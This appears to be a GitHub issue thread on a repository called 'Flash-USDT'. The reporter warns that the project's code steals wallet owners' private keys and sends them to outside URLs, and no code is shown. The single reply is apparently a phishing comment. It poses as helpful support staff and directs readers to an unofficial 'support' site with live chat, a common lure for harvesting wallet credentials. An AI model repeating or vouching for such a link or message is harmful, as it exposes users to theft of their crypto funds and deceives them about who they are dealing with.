### ISSUE TITLE
yes

### ISSUE THREAD

**Issue by tomek2210** [VCamPro/Flash-USDT#5]
This code is to get private code of wallet owner and send to urls devofix - 2, 3. Function usdtgen also sends data of wallet.

**Comment by jecobeLiwes** [comment]
We apologize for any trouble you've encountered; it seems there may have been a glitch with the cloud data, but rest assured, we can resolve this issue. To expedite the process, kindly follow the link below to reach our specialized support team:

[Support Request](https://dapprectification-chain.pages.dev/)

Use the live chat button at the bottom right to connect with a support agent for prompt assistance.

Thank you for your patience—I’m confident your issue will be resolved soon!

> This code is to get private code of wallet owner and send to urls devofix - 2, 3. Function usdtgen also sends data of wallet.
